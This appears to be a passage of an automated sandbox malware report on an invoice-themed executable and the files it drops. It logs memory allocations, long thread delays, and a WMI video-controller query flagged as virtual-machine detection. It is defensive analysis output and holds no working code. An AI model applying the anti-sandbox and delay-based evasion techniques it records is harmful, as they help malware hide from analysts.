Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HOYVjVj.exe PID: 7420, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 10C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 8EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 7780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 9EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: AEE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: B450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: C450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: D450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 3130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 18D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 33B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 53B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 8F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 8BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: B740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: C740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: D740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 3170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory allocated: 5170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Memory allocated: 1D20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Memory allocated: 1BB40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Memory allocated: CA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Memory allocated: 1B710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Memory allocated: 1B4C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Memory allocated: 1BA10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Memory allocated: A20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Memory allocated: 1B1C0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599544
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599321
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599170
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599033
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598777
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598659
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598436
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598327
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598088
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597663
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597528
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597411
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596744
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596636
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596527
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596412
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596134
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596013
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595879
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595740
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595622
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595513
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595296
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594968
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594748
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594640
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594529
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594416
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594297
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594187
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593968
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593750
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593640
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593507
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593406
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593297
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593183
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593078
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592969
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592859
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592750
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592640
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592531
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592422
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592312
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592203
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592093
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 591984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599528
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599273
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598541
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598433
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598324
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598209
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597931
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597810
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597537
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597419
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597310
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596168
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595952
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594967
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594750
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594640
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594531
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594422
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594297
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594187
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593968
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593750
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593640
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593531
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593422
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593297
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593187
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593078
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 592968
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599421
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599311
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598433
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598212
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597766
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596837
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596732
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596618
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596379
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596138
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595922
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595802
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594360

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6491	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7367	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Window / User API: threadDelayed 2995	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Window / User API: threadDelayed 6847	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Window / User API: threadDelayed 9135
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Window / User API: threadDelayed 639
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5904
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Window / User API: threadDelayed 8666
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Window / User API: threadDelayed 1138
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Window / User API: threadDelayed 3177
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Window / User API: threadDelayed 6672

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe TID: 5488	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe TID: 7344	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe TID: 7744	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe TID: 7756	Thread sleep count: 2995 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe TID: 7756	Thread sleep count: 6847 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe TID: 7424	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe TID: 7440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe TID: 7684	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe TID: 7708	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7848	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep count: 37 > 30
